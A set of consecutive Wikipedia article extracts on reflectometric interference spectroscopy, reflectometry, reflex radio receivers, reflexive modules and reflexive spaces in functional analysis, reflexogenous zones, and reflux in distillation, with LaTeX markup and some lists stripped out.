White light is directed vertically onto a multiple-layer system of a SiO 2 , a high-refractive Ta 2 O 5 and an additional SiO 2 layer (this additional layer can be chemically modified). The partial beams of the white light are reflected at each phase boundary and then refracted (transmitted). These reflected partial beams superimpose which results in an interference spectrum that is detected using a diode array spectrometer. Through chemical modification the upper SiO 2 layer is changed in a way to allow interaction with target molecules. This interaction causes a change in the thickness of the physical layer d and the refractive index n within this layer. The product of both defines the optical thickness of the layer: n • d. A change in the optical thickness results in a modulation of the interference spectrum. Monitoring this change over time allows to observe the binding behaviour of the target molecules.
RIfS is used especially as a detection method in chemo- and biosensors .
Chemosensors are particularly suitable for measurements under difficult conditions and in the gaseous phase. As sensitive layers, mostly non-selective measuring polymers are used which sort the analytes according to size (the so-called molecular sieve effect when using microporous polymers) or according to polarity (e.g. functionalized polydimethylsiloxanes ). When performing non-selective measurements, a sum signal from several analytes is measured which means that multivariate data analyses such as neural networks have to be used for quantification. However, it is also possible to use selectively measuring polymers, so-called molecular imprinted polymers (MIPs) which provide artificial recognition elements.
When using biosensors , polymers such as polyethylene glycols or dextrans are applied onto the layer system, and on these recognition elements for biomolecules are immobilized. Basically, any molecule can be used as recognition element (proteins such as antibodies , DNA/RNA such as aptamers , small organic molecules such as estrone , but also lipids such as phospholipid membranes).
RIfS, like SPR is a label-free technique, which allows the time-resolved observation of interaction among the binding partners without the use of fluorescence or radioactive labels. | https://en.wikipedia.org/wiki/Reflectometric_interference_spectroscopy |
Reflectometry is a general term for the use of the reflection of waves or pulses at surfaces and interfaces to detect or characterize objects, sometimes to detect anomalies as in fault detection and medical diagnosis . [ 1 ]
There are many different forms of reflectometry. They can be classified in several ways: by the used radiation (electromagnetic, ultrasound, particle beams), by the geometry of wave propagation (unguided versus wave guides or cables), by the involved length scales (wavelength and penetration depth in relation to size of the investigated object), by the method of measurement (continuous versus pulsed, polarization resolved, ...), and by the application domain.
Many techniques are based on the principle of reflectometry and are distinguished by the type of waves used and the analysis of the reflected signal. Among all these techniques, we can classify the main but not limited to: | https://en.wikipedia.org/wiki/Reflectometry |
A reflex radio receiver , occasionally called a reflectional receiver , is a radio receiver design in which the same amplifier is used to amplify the high-frequency radio signal (RF) and low-frequency audio (sound) signal (AF). [ 2 ] [ 3 ] [ 4 ] It was first invented in 1914 by German scientists Wilhelm Schloemilch and Otto von Bronk, [ 1 ] and rediscovered and extended to multiple tubes in 1917 by Marius Latour [ 5 ] [ 3 ] [ 6 ] and William H. Priess. [ 3 ] The radio signal from the antenna and tuned circuit passes through an amplifier, is demodulated in a detector which extracts the audio signal from the radio carrier , and the resulting audio signal passes again through the same amplifier for audio amplification before being applied to the earphone or loudspeaker. The reason for using the amplifier for "double duty" was to reduce the number of active devices, vacuum tubes or transistors , required in the circuit, to reduce the cost. The economical reflex circuit was used in inexpensive vacuum tube radios in the 1920s, and was revived again in simple portable tube radios in the 1930s. [ 7 ]
The block diagram shows the general form of a simple reflex receiver. The receiver functions as a tuned radio frequency (TRF) receiver. The radio frequency (RF) signal from the tuned circuit ( bandpass filter ) is amplified, then passes through the high pass filter to the demodulator , which extracts the audio frequency (AF) ( modulation ) signal from the carrier wave . The audio signal is added back into the input of the amplifier, and is amplified again. At the output of the amplifier the audio is separated from the RF signal by the low pass filter and is applied to the earphone. The amplifier could be a single stage or multiple stages. It can be seen that since each active device (tube or transistor) is used to amplify the signal twice, the reflex circuit is equivalent to an ordinary receiver with double the number of active devices.
The reflex receiver should not be confused with a regenerative receiver , in which the same signal is fed back from the output of the amplifier to its input. In the reflex circuit it is only the audio extracted by the demodulator which is added to the amplifier input, so there are two separate signals at different frequencies passing through the amplifier at the same time.
The reason the two signals, the RF and AF currents, can pass simultaneously through the amplifier without interfering is due to the superposition principle because the amplifier is linear . Since the two signals have different frequencies, they can be separated at the output with frequency selective filters. Therefore the proper functioning of the circuit depends on the amplifier operating in the linear region of its transfer curve . If the amplifier is significantly nonlinear, intermodulation distortion will occur and the audio signal will modulate the RF signal, resulting in audio feedback which can cause a shrieking in the earphone. The presence of the audio return circuit from the amplifier output to input made the reflex circuit vulnerable to such parasitic oscillation problems.
The most common application of the reflex circuit in the 1920s was in inexpensive single tube receivers, because many consumers could not afford more than one vacuum tube, and the reflex circuit got the most out of a single tube, it was equivalent to a two-tube set. During this period the demodulator was usually a carborundum point contact diode , but sometimes a vacuum tube grid-leak detector . However multitube receivers like the TRF and superheterodyne were also made with some of their amplifier stages "reflexed".
Low cost mains-powered radios that used a reflex TRF design, with only three tubes, were still being mass produced in the late 1940s. [ 8 ] [ 9 ]
The reflex principle was used in compact superheterodyne radio receivers from the 1930s [ 10 ] and continued into the 1950s, [ 11 ] until at least 1959; [ 12 ] the intermediate frequency amplifier stage was also the first audio frequency stage using a reflex arrangement. That arrangement provided similar performance, in a four-tube radio, as one with five tubes. Often, but not always, such reflex receivers did not have Automatic Gain Control (AGC) , and it was usually not possible to reduce the volume completely to zero, even at the minimum volume setting. [ 9 ] At least one type of tube was specially designed for this kind of receiver design. [ 13 ]
The diagram (right) shows one of the most common single tube reflex circuits from the early 1920s. It functioned as a TRF receiver with one stage of RF and one stage of audio amplification. The radio frequency (RF) signal from the antenna passes through the bandpass filter C 1 , L 1 , L 2 , C 2 and is applied to the grid of the directly heated triode , V 1 . The capacitor C 6 bypasses the RF signal around the audio transformer winding T 2 which would block it. The amplified signal from the plate of the tube is applied to the RF transformer L 3 , L 4 while C 3 bypasses the RF signal around the headphone coils. The tuned secondary L 4 , C 5 which is tuned to the input frequency, serves as a second bandpass filter as well as blocking the audio signal in the plate circuit from getting to the detector. Its output is rectified by semiconductor diode D , which was a carborundum point contact type.
The resulting audio signal extracted by the diode from the RF signal is coupled back into the grid circuit by audio transformer T 1 , T 2 whose iron core serves as a choke to help prevent RF from getting back into the grid circuit and causing feedback. The capacitor C 4 provides more protection against feedback, blocking the pulses of RF from the diode, but is usually not needed since the transformer's winding T 1 normally has enough parasitic capacitance. The audio signal is applied to the grid of the tube and amplified. The amplified audio signal from the plate passes easily through the low inductance RF primary winding L 3 and is applied to the earphones T . The rheostat R 1 controlled the filament current, and in these early sets was used as a volume control. | https://en.wikipedia.org/wiki/Reflex_receiver |
In abstract algebra , a module M over a ring R is called torsionless if it can be embedded into some direct product R I . Equivalently, M is torsionless if each non-zero element of M has non-zero image under some R -linear functional f :
This notion was introduced by Hyman Bass . [ citation needed ]
A module is torsionless if and only if the canonical map into its double dual ,
is injective . If this map is bijective then the module is called reflexive . For this reason, torsionless modules are also known as semi-reflexive .
Stephen Chase proved the following characterization of semihereditary rings in connection with torsionless modules:
For any ring R , the following conditions are equivalent: [ 4 ]
(The mixture of left/right adjectives in the statement is not a mistake.) | https://en.wikipedia.org/wiki/Reflexive_module |
In the area of mathematics known as functional analysis , a reflexive space is a locally convex topological vector space for which the canonical evaluation map from X {\displaystyle X} into its bidual (which is the strong dual of the strong dual of X {\displaystyle X} ) is a homeomorphism (or equivalently, a TVS isomorphism ).
A normed space is reflexive if and only if this canonical evaluation map is surjective , in which case this (always linear) evaluation map is an isometric isomorphism and the normed space is a Banach space . Those spaces for which the canonical evaluation map is surjective are called semi-reflexive spaces.
In 1951, R. C. James discovered a Banach space, now known as James' space , that is not reflexive (meaning that the canonical evaluation map is not an isomorphism) but is nevertheless isometrically isomorphic to its bidual (any such isometric isomorphism is necessarily not the canonical evaluation map). So importantly, for a Banach space to be reflexive, it is not enough for it to be isometrically isomorphic to its bidual; it is the canonical evaluation map in particular that has to be a homeomorphism.
Reflexive spaces play an important role in the general theory of locally convex TVSs and in the theory of Banach spaces in particular. Hilbert spaces are prominent examples of reflexive Banach spaces. Reflexive Banach spaces are often characterized by their geometric properties.
Suppose that X {\displaystyle X} is a topological vector space (TVS) over the field F {\displaystyle \mathbb {F} } (which is either the real or complex numbers) whose continuous dual space , X ′ , {\displaystyle X^{\prime },} separates points on X {\displaystyle X} (that is, for any x ∈ X , x ≠ 0 {\displaystyle x\in X,x\neq 0} there exists some x ′ ∈ X ′ {\displaystyle x^{\prime }\in X^{\prime }} such that x ′ ( x ) ≠ 0 {\displaystyle x^{\prime }(x)\neq 0} ).
Let X b ′ {\displaystyle X_{b}^{\prime }} (some texts write X β ′ {\displaystyle X_{\beta }^{\prime }} ) denote the strong dual of X , {\displaystyle X,} which is the vector space X ′ {\displaystyle X^{\prime }} of continuous linear functionals on X {\displaystyle X} endowed with the topology of uniform convergence on bounded subsets of X {\displaystyle X} ;
this topology is also called the strong dual topology and it is the "default" topology placed on a continuous dual space (unless another topology is specified).
If X {\displaystyle X} is a normed space, then the strong dual of X {\displaystyle X} is the continuous dual space X ′ {\displaystyle X^{\prime }} with its usual norm topology.
The bidual of X , {\displaystyle X,} denoted by X ′ ′ , {\displaystyle X^{\prime \prime },} is the strong dual of X b ′ {\displaystyle X_{b}^{\prime }} ; that is, it is the space ( X b ′ ) b ′ . {\displaystyle \left(X_{b}^{\prime }\right)_{b}^{\prime }.} [ 1 ] If X {\displaystyle X} is a normed space, then X ′ ′ {\displaystyle X^{\prime \prime }} is the continuous dual space of the Banach space X b ′ {\displaystyle X_{b}^{\prime }} with its usual norm topology.
For any x ∈ X , {\displaystyle x\in X,} let J x : X ′ → F {\displaystyle J_{x}:X^{\prime }\to \mathbb {F} } be defined by J x ( x ′ ) = x ′ ( x ) , {\displaystyle J_{x}\left(x^{\prime }\right)=x^{\prime }(x),} where J x {\displaystyle J_{x}} is a linear map called the evaluation map at x {\displaystyle x} ;
since J x : X b ′ → F {\displaystyle J_{x}:X_{b}^{\prime }\to \mathbb {F} } is necessarily continuous, it follows that J x ∈ ( X b ′ ) ′ . {\displaystyle J_{x}\in \left(X_{b}^{\prime }\right)^{\prime }.} Since X ′ {\displaystyle X^{\prime }} separates points on X , {\displaystyle X,} the linear map J : X → ( X b ′ ) ′ {\displaystyle J:X\to \left(X_{b}^{\prime }\right)^{\prime }} defined by J ( x ) := J x {\displaystyle J(x):=J_{x}} is injective where this map is called the evaluation map or the canonical map .
Call X {\displaystyle X} semi-reflexive if J : X → ( X b ′ ) ′ {\displaystyle J:X\to \left(X_{b}^{\prime }\right)^{\prime }} is bijective (or equivalently, surjective ) and we call X {\displaystyle X} reflexive if in addition J : X → X ′ ′ = ( X b ′ ) b ′ {\displaystyle J:X\to X^{\prime \prime }=\left(X_{b}^{\prime }\right)_{b}^{\prime }} is an isomorphism of TVSs. [ 1 ] A normable space is reflexive if and only if it is semi-reflexive or equivalently, if and only if the evaluation map is surjective.
Suppose X {\displaystyle X} is a normed vector space over the number field F = R {\displaystyle \mathbb {F} =\mathbb {R} } or F = C {\displaystyle \mathbb {F} =\mathbb {C} } (the real numbers or the complex numbers ), with a norm ‖ ⋅ ‖ . {\displaystyle \|\,\cdot \,\|.} Consider its dual normed space X ′ , {\displaystyle X^{\prime },} that consists of all continuous linear functionals f : X → F {\displaystyle f:X\to \mathbb {F} } and is equipped with the dual norm ‖ ⋅ ‖ ′ {\displaystyle \|\,\cdot \,\|^{\prime }} defined by ‖ f ‖ ′ = sup { | f ( x ) | : x ∈ X , ‖ x ‖ = 1 } . {\displaystyle \|f\|^{\prime }=\sup\{|f(x)|\,:\,x\in X,\ \|x\|=1\}.}
The dual X ′ {\displaystyle X^{\prime }} is a normed space (a Banach space to be precise), and its dual normed space X ′ ′ = ( X ′ ) ′ {\displaystyle X^{\prime \prime }=\left(X^{\prime }\right)^{\prime }} is called bidual space for X . {\displaystyle X.} The bidual consists of all continuous linear functionals h : X ′ → F {\displaystyle h:X^{\prime }\to \mathbb {F} } and is equipped with the norm ‖ ⋅ ‖ ′ ′ {\displaystyle \|\,\cdot \,\|^{\prime \prime }} dual to ‖ ⋅ ‖ ′ . {\displaystyle \|\,\cdot \,\|^{\prime }.} Each vector x ∈ X {\displaystyle x\in X} generates a scalar function J ( x ) : X ′ → F {\displaystyle J(x):X^{\prime }\to \mathbb {F} } by the formula: J ( x ) ( f ) = f ( x ) for all f ∈ X ′ , {\displaystyle J(x)(f)=f(x)\qquad {\text{ for all }}f\in X^{\prime },} and J ( x ) {\displaystyle J(x)} is a continuous linear functional on X ′ , {\displaystyle X^{\prime },} that is, J ( x ) ∈ X ′ ′ . {\displaystyle J(x)\in X^{\prime \prime }.} One obtains in this way a map J : X → X ′ ′ {\displaystyle J:X\to X^{\prime \prime }} called evaluation map , that is linear. It follows from the Hahn–Banach theorem that J {\displaystyle J} is injective and preserves norms: for all x ∈ X ‖ J ( x ) ‖ ′ ′ = ‖ x ‖ , {\displaystyle {\text{ for all }}x\in X\qquad \|J(x)\|^{\prime \prime }=\|x\|,} that is, J {\displaystyle J} maps X {\displaystyle X} isometrically onto its image J ( X ) {\displaystyle J(X)} in X ′ ′ . {\displaystyle X^{\prime \prime }.} Furthermore, the image J ( X ) {\displaystyle J(X)} is closed in X ′ ′ , {\displaystyle X^{\prime \prime },} but it need not be equal to X ′ ′ . {\displaystyle X^{\prime \prime }.}
A normed space X {\displaystyle X} is called reflexive if it satisfies the following equivalent conditions:
A reflexive space X {\displaystyle X} is a Banach space, since X {\displaystyle X} is then isometric to the Banach space X ′ ′ . {\displaystyle X^{\prime \prime }.}
A Banach space X {\displaystyle X} is reflexive if it is linearly isometric to its bidual under this canonical embedding J . {\displaystyle J.} James' space is an example of a non-reflexive space which is linearly isometric to its bidual . Furthermore, the image of James' space under the canonical embedding J {\displaystyle J} has codimension one in its bidual. [ 2 ] A Banach space X {\displaystyle X} is called quasi-reflexive (of order d {\displaystyle d} ) if the quotient X ′ ′ / J ( X ) {\displaystyle X^{\prime \prime }/J(X)} has finite dimension d . {\displaystyle d.}
Since every finite-dimensional normed space is a reflexive Banach space , only infinite-dimensional spaces can be non-reflexive.
If a Banach space Y {\displaystyle Y} is isomorphic to a reflexive Banach space X {\displaystyle X} then Y {\displaystyle Y} is reflexive. [ 3 ]
Every closed linear subspace of a reflexive space is reflexive. The continuous dual of a reflexive space is reflexive. Every quotient of a reflexive space by a closed subspace is reflexive. [ 4 ]
Let X {\displaystyle X} be a Banach space. The following are equivalent.
Since norm-closed convex subsets in a Banach space are weakly closed, [ 10 ] it follows from the third property that closed bounded convex subsets of a reflexive space X {\displaystyle X} are weakly compact. Thus, for every decreasing sequence of non-empty closed bounded convex subsets of X , {\displaystyle X,} the intersection is non-empty. As a consequence, every continuous convex function f {\displaystyle f} on a closed convex subset C {\displaystyle C} of X , {\displaystyle X,} such that the set C t = { x ∈ C : f ( x ) ≤ t } {\displaystyle C_{t}=\{x\in C\,:\,f(x)\leq t\}} is non-empty and bounded for some real number t , {\displaystyle t,} attains its minimum value on C . {\displaystyle C.}
The promised geometric property of reflexive Banach spaces is the following: if C {\displaystyle C} is a closed non-empty convex subset of the reflexive space X , {\displaystyle X,} then for every x ∈ X {\displaystyle x\in X} there exists a c ∈ C {\displaystyle c\in C} such that ‖ x − c ‖ {\displaystyle \|x-c\|} minimizes the distance between x {\displaystyle x} and points of C . {\displaystyle C.} This follows from the preceding result for convex functions, applied to f ( y ) + ‖ y − x ‖ . {\displaystyle f(y)+\|y-x\|.} Note that while the minimal distance between x {\displaystyle x} and C {\displaystyle C} is uniquely defined by x , {\displaystyle x,} the point c {\displaystyle c} is not. The closest point c {\displaystyle c} is unique when X {\displaystyle X} is uniformly convex.
A reflexive Banach space is separable if and only if its continuous dual is separable. This follows from the fact that for every normed space Y , {\displaystyle Y,} separability of the continuous dual Y ′ {\displaystyle Y^{\prime }} implies separability of Y . {\displaystyle Y.} [ 11 ]
Informally, a super-reflexive Banach space X {\displaystyle X} has the following property: given an arbitrary Banach space Y , {\displaystyle Y,} if all finite-dimensional subspaces of Y {\displaystyle Y} have a very similar copy sitting somewhere in X , {\displaystyle X,} then Y {\displaystyle Y} must be reflexive. By this definition, the space X {\displaystyle X} itself must be reflexive. As an elementary example, every Banach space Y {\displaystyle Y} whose two dimensional subspaces are isometric to subspaces of X = ℓ 2 {\displaystyle X=\ell ^{2}} satisfies the parallelogram law , hence [ 12 ] Y {\displaystyle Y} is a Hilbert space, therefore Y {\displaystyle Y} is reflexive. So ℓ 2 {\displaystyle \ell ^{2}} is super-reflexive.
The formal definition does not use isometries, but almost isometries. A Banach space Y {\displaystyle Y} is finitely representable [ 13 ] in a Banach space X {\displaystyle X} if for every finite-dimensional subspace Y 0 {\displaystyle Y_{0}} of Y {\displaystyle Y} and every ϵ > 0 , {\displaystyle \epsilon >0,} there is a subspace X 0 {\displaystyle X_{0}} of X {\displaystyle X} such that the multiplicative Banach–Mazur distance between X 0 {\displaystyle X_{0}} and Y 0 {\displaystyle Y_{0}} satisfies d ( X 0 , Y 0 ) < 1 + ε . {\displaystyle d\left(X_{0},Y_{0}\right)<1+\varepsilon .}
A Banach space finitely representable in ℓ 2 {\displaystyle \ell ^{2}} is a Hilbert space. Every Banach space is finitely representable in c 0 . {\displaystyle c_{0}.} The Lp space L p ( [ 0 , 1 ] ) {\displaystyle L^{p}([0,1])} is finitely representable in ℓ p . {\displaystyle \ell ^{p}.}
A Banach space X {\displaystyle X} is super-reflexive if all Banach spaces Y {\displaystyle Y} finitely representable in X {\displaystyle X} are reflexive, or, in other words, if no non-reflexive space Y {\displaystyle Y} is finitely representable in X . {\displaystyle X.} The notion of ultraproduct of a family of Banach spaces [ 14 ] allows for a concise definition: the Banach space X {\displaystyle X} is super-reflexive when its ultrapowers are reflexive.
James proved that a space is super-reflexive if and only if its dual is super-reflexive. [ 13 ]
One of James' characterizations of super-reflexivity uses the growth of separated trees. [ 15 ] The description of a vectorial binary tree begins with a rooted binary tree labeled by vectors: a tree of height n {\displaystyle n} in a Banach space X {\displaystyle X} is a family of 2 n + 1 − 1 {\displaystyle 2^{n+1}-1} vectors of X , {\displaystyle X,} that can be organized in successive levels, starting with level 0 that consists of a single vector x ∅ , {\displaystyle x_{\varnothing },} the root of the tree, followed, for k = 1 , … , n , {\displaystyle k=1,\ldots ,n,} by a family of s k {\displaystyle s^{k}} 2 vectors forming level k : {\displaystyle k:} { x ε 1 , … , ε k } , ε j = ± 1 , j = 1 , … , k , {\displaystyle \left\{x_{\varepsilon _{1},\ldots ,\varepsilon _{k}}\right\},\quad \varepsilon _{j}=\pm 1,\quad j=1,\ldots ,k,} that are the children of vertices of level k − 1. {\displaystyle k-1.} In addition to the tree structure , it is required here that each vector that is an internal vertex of the tree be the midpoint between its two children: x ∅ = x 1 + x − 1 2 , x ε 1 , … , ε k = x ε 1 , … , ε k , 1 + x ε 1 , … , ε k , − 1 2 , 1 ≤ k < n . {\displaystyle x_{\emptyset }={\frac {x_{1}+x_{-1}}{2}},\quad x_{\varepsilon _{1},\ldots ,\varepsilon _{k}}={\frac {x_{\varepsilon _{1},\ldots ,\varepsilon _{k},1}+x_{\varepsilon _{1},\ldots ,\varepsilon _{k},-1}}{2}},\quad 1\leq k<n.}
Given a positive real number t , {\displaystyle t,} the tree is said to be t {\displaystyle t} -separated if for every internal vertex, the two children are t {\displaystyle t} -separated in the given space norm: ‖ x 1 − x − 1 ‖ ≥ t , ‖ x ε 1 , … , ε k , 1 − x ε 1 , … , ε k , − 1 ‖ ≥ t , 1 ≤ k < n . {\displaystyle \left\|x_{1}-x_{-1}\right\|\geq t,\quad \left\|x_{\varepsilon _{1},\ldots ,\varepsilon _{k},1}-x_{\varepsilon _{1},\ldots ,\varepsilon _{k},-1}\right\|\geq t,\quad 1\leq k<n.}
Theorem. [ 15 ] The Banach space X {\displaystyle X} is super-reflexive if and only if for every t ∈ ( 0 , 2 π ] , {\displaystyle t\in (0,2\pi ],} there is a number n ( t ) {\displaystyle n(t)} such that every t {\displaystyle t} -separated tree contained in the unit ball of X {\displaystyle X} has height less than n ( t ) . {\displaystyle n(t).}
Uniformly convex spaces are super-reflexive. [ 15 ] Let X {\displaystyle X} be uniformly convex, with modulus of convexity δ X {\displaystyle \delta _{X}} and let t {\displaystyle t} be a real number in ( 0 , 2 ] . {\displaystyle (0,2].} By the properties of the modulus of convexity, a t {\displaystyle t} -separated tree of height n , {\displaystyle n,} contained in the unit ball, must have all points of level n − 1 {\displaystyle n-1} contained in the ball of radius 1 − δ X ( t ) < 1. {\displaystyle 1-\delta _{X}(t)<1.} By induction, it follows that all points of level n − k {\displaystyle n-k} are contained in the ball of radius ( 1 − δ X ( t ) ) j , j = 1 , … , n . {\displaystyle \left(1-\delta _{X}(t)\right)^{j},\ j=1,\ldots ,n.}
If the height n {\displaystyle n} was so large that ( 1 − δ X ( t ) ) n − 1 < t / 2 , {\displaystyle \left(1-\delta _{X}(t)\right)^{n-1}<t/2,} then the two points x 1 , x − 1 {\displaystyle x_{1},x_{-1}} of the first level could not be t {\displaystyle t} -separated, contrary to the assumption. This gives the required bound n ( t ) , {\displaystyle n(t),} function of δ X ( t ) {\displaystyle \delta _{X}(t)} only.
Using the tree-characterization, Enflo proved [ 16 ] that super-reflexive Banach spaces admit an equivalent uniformly convex norm. Trees in a Banach space are a special instance of vector-valued martingales . Adding techniques from scalar martingale theory, Pisier improved Enflo's result by showing [ 17 ] that a super-reflexive space X {\displaystyle X} admits an equivalent uniformly convex norm for which the modulus of convexity satisfies, for some constant c > 0 {\displaystyle c>0} and some real number q ≥ 2 , {\displaystyle q\geq 2,} δ X ( t ) ≥ c t q , whenever t ∈ [ 0 , 2 ] . {\displaystyle \delta _{X}(t)\geq c\,t^{q},\quad {\text{ whenever }}t\in [0,2].}
The notion of reflexive Banach space can be generalized to topological vector spaces in the following way.
Let X {\displaystyle X} be a topological vector space over a number field F {\displaystyle \mathbb {F} } (of real numbers R {\displaystyle \mathbb {R} } or complex numbers C {\displaystyle \mathbb {C} } ). Consider its strong dual space X b ′ , {\displaystyle X_{b}^{\prime },} which consists of all continuous linear functionals f : X → F {\displaystyle f:X\to \mathbb {F} } and is equipped with the strong topology b ( X ′ , X ) , {\displaystyle b\left(X^{\prime },X\right),} that is,, the topology of uniform convergence on bounded subsets in X . {\displaystyle X.} The space X b ′ {\displaystyle X_{b}^{\prime }} is a topological vector space (to be more precise, a locally convex space), so one can consider its strong dual space ( X b ′ ) b ′ , {\displaystyle \left(X_{b}^{\prime }\right)_{b}^{\prime },} which is called the strong bidual space for X . {\displaystyle X.} It consists of all continuous linear functionals h : X b ′ → F {\displaystyle h:X_{b}^{\prime }\to \mathbb {F} } and is equipped with the strong topology b ( ( X b ′ ) ′ , X b ′ ) . {\displaystyle b\left(\left(X_{b}^{\prime }\right)^{\prime },X_{b}^{\prime }\right).} Each vector x ∈ X {\displaystyle x\in X} generates a map J ( x ) : X b ′ → F {\displaystyle J(x):X_{b}^{\prime }\to \mathbb {F} } by the following formula: J ( x ) ( f ) = f ( x ) , f ∈ X ′ . {\displaystyle J(x)(f)=f(x),\qquad f\in X^{\prime }.} This is a continuous linear functional on X b ′ , {\displaystyle X_{b}^{\prime },} that is,, J ( x ) ∈ ( X b ′ ) b ′ . {\displaystyle J(x)\in \left(X_{b}^{\prime }\right)_{b}^{\prime }.} This induces a map called the evaluation map : J : X → ( X b ′ ) b ′ . {\displaystyle J:X\to \left(X_{b}^{\prime }\right)_{b}^{\prime }.} This map is linear. If X {\displaystyle X} is locally convex, from the Hahn–Banach theorem it follows that J {\displaystyle J} is injective and open (that is, for each neighbourhood of zero U {\displaystyle U} in X {\displaystyle X} there is a neighbourhood of zero V {\displaystyle V} in ( X b ′ ) b ′ {\displaystyle \left(X_{b}^{\prime }\right)_{b}^{\prime }} such that J ( U ) ⊇ V ∩ J ( X ) {\displaystyle J(U)\supseteq V\cap J(X)} ). But it can be non-surjective and/or discontinuous.
A locally convex space X {\displaystyle X} is called
Theorem [ 19 ] — A locally convex Hausdorff space X {\displaystyle X} is semi-reflexive if and only if X {\displaystyle X} with the σ ( X , X ∗ ) {\displaystyle \sigma (X,X^{*})} -topology has the Heine–Borel property (i.e. weakly closed and bounded subsets of X {\displaystyle X} are weakly compact).
Theorem [ 20 ] [ 21 ] — A locally convex space X {\displaystyle X} is reflexive if and only if it is semi-reflexive and barreled .
Theorem [ 22 ] — The strong dual of a semireflexive space is barrelled.
Theorem [ 23 ] — If X {\displaystyle X} is a Hausdorff locally convex space then the canonical injection from X {\displaystyle X} into its bidual is a topological embedding if and only if X {\displaystyle X} is infrabarreled .
If X {\displaystyle X} is a Hausdorff locally convex space then the following are equivalent:
If X {\displaystyle X} is a Hausdorff locally convex space then the following are equivalent:
If X {\displaystyle X} is a normed space then the following are equivalent:
Theorem [ 29 ] — A real Banach space is reflexive if and only if every pair of non-empty disjoint closed convex subsets, one of which is bounded, can be strictly separated by a hyperplane .
James' theorem — A Banach space B {\displaystyle B} is reflexive if and only if every continuous linear functional on B {\displaystyle B} attains its supremum on the closed unit ball in B . {\displaystyle B.}
A normed space that is semireflexive is a reflexive Banach space. [ 30 ] A closed vector subspace of a reflexive Banach space is reflexive. [ 23 ]
Let X {\displaystyle X} be a Banach space and M {\displaystyle M} a closed vector subspace of X . {\displaystyle X.} If two of X , M , {\displaystyle X,M,} and X / M {\displaystyle X/M} are reflexive then they all are. [ 23 ] This is why reflexivity is referred to as a three-space property . [ 23 ]
If a barreled locally convex Hausdorff space is semireflexive then it is reflexive. [ 1 ]
The strong dual of a reflexive space is reflexive. [ 31 ] Every Montel space is reflexive. [ 26 ] And the strong dual of a Montel space is a Montel space (and thus is reflexive). [ 26 ]
A locally convex Hausdorff reflexive space is barrelled .
If X {\displaystyle X} is a normed space then I : X → X ′ ′ {\displaystyle I:X\to X^{\prime \prime }} is an isometry onto a closed subspace of X ′ ′ . {\displaystyle X^{\prime \prime }.} [ 30 ] This isometry can be expressed by: ‖ x ‖ = sup ‖ x ′ ‖ ≤ 1 x ′ ∈ X ′ , | ⟨ x ′ , x ⟩ | . {\displaystyle \|x\|=\sup _{\stackrel {x^{\prime }\in X^{\prime },}{\|x^{\prime }\|\leq 1}}\left|\left\langle x^{\prime },x\right\rangle \right|.}
Suppose that X {\displaystyle X} is a normed space and X ′ ′ {\displaystyle X^{\prime \prime }} is its bidual equipped with the bidual norm. Then the unit ball of X , {\displaystyle X,} I ( { x ∈ X : ‖ x ‖ ≤ 1 } ) {\displaystyle I(\{x\in X:\|x\|\leq 1\})} is dense in the unit ball { x ′ ′ ∈ X ′ ′ : ‖ x ′ ′ ‖ ≤ 1 } {\displaystyle \left\{x^{\prime \prime }\in X^{\prime \prime }:\left\|x^{\prime \prime }\right\|\leq 1\right\}} of X ′ ′ {\displaystyle X^{\prime \prime }} for the weak topology σ ( X ′ ′ , X ′ ) . {\displaystyle \sigma \left(X^{\prime \prime },X^{\prime }\right).} [ 30 ]
A stereotype space, or polar reflexive space, is defined as a topological vector space (TVS) satisfying a similar condition of reflexivity, but with the topology of uniform convergence on totally bounded subsets (instead of bounded subsets) in the definition of dual space X ′ . {\displaystyle X^{\prime }.} More precisely, a TVS X {\displaystyle X} is called polar reflexive [ 34 ] or stereotype if the evaluation map into the second dual space J : X → X ⋆ ⋆ , J ( x ) ( f ) = f ( x ) , x ∈ X , f ∈ X ⋆ {\displaystyle J:X\to X^{\star \star },\quad J(x)(f)=f(x),\quad x\in X,\quad f\in X^{\star }} is an isomorphism of topological vector spaces . [ 18 ] Here the stereotype dual space X ⋆ {\displaystyle X^{\star }} is defined as the space of continuous linear functionals X ′ {\displaystyle X^{\prime }} endowed with the topology of uniform convergence on totally bounded sets in X {\displaystyle X} (and the stereotype second dual space X ⋆ ⋆ {\displaystyle X^{\star \star }} is the space dual to X ⋆ {\displaystyle X^{\star }} in the same sense).
In contrast to the classical reflexive spaces the class Ste of stereotype spaces is very wide (it contains, in particular, all Fréchet spaces and thus, all Banach spaces ), it forms a closed monoidal category , and it admits standard operations (defined inside of Ste ) of constructing new spaces, like taking closed subspaces, quotient spaces, projective and injective limits, the space of operators, tensor products, etc. The category Ste have applications in duality theory for non-commutative groups.
Similarly, one can replace the class of bounded (and totally bounded) subsets in X {\displaystyle X} in the definition of dual space X ′ , {\displaystyle X^{\prime },} by other classes of subsets, for example, by the class of compact subsets in X {\displaystyle X} – the spaces defined by the corresponding reflexivity condition are called reflective , [ 35 ] [ 36 ] and they form an even wider class than Ste , but it is not clear (2012), whether this class forms a category with properties similar to those of Ste . | https://en.wikipedia.org/wiki/Reflexive_space |
Reflexogenous (reflexogenic) zone (or the receptive field of a reflex ) is the area of the body stimulation of which causes a definite unconditioned reflex . [ 1 ] : vol. II, p. 103 For example, stimulation of the mucosa of the nasopharynx elicits a sneezing reflex, and stimulation of the tracheae and bronchi elicits a coughing reflex. [ 2 ] The receptive fields of various reflexes may overlap, and in consequence a stimulus applied to a certain part of the skin can elicit one reflex or another depending on its strength and the state of the central nervous system . | https://en.wikipedia.org/wiki/Reflexogenous_zone |
Reflux is a technique involving the condensation of vapors and the return of this condensate to the system from which it originated. It is used in industrial [ 1 ] and laboratory [ 2 ] distillations . It is also used in chemistry to supply energy to reactions over a long period of time.
The term reflux [ 1 ] [ 3 ] [ 4 ] is very widely used in industries that utilize large-scale distillation columns and fractionators such as petroleum refineries , petrochemical and chemical plants , and natural gas processing plants.
In that context, reflux refers to the portion of the overhead liquid product from a distillation column or fractionator that is returned to the upper part of the column as shown in the schematic diagram of a typical industrial distillation column. Inside the column, the downflowing reflux liquid provides cooling and condensation of the upflowing vapors thereby increasing the efficiency of the distillation column.
The more reflux provided for a given number of theoretical plates , the better is the column's separation of lower boiling materials from higher boiling materials. Conversely, for a given desired separation, the more reflux is provided, the fewer theoretical plates are required. [ 5 ]
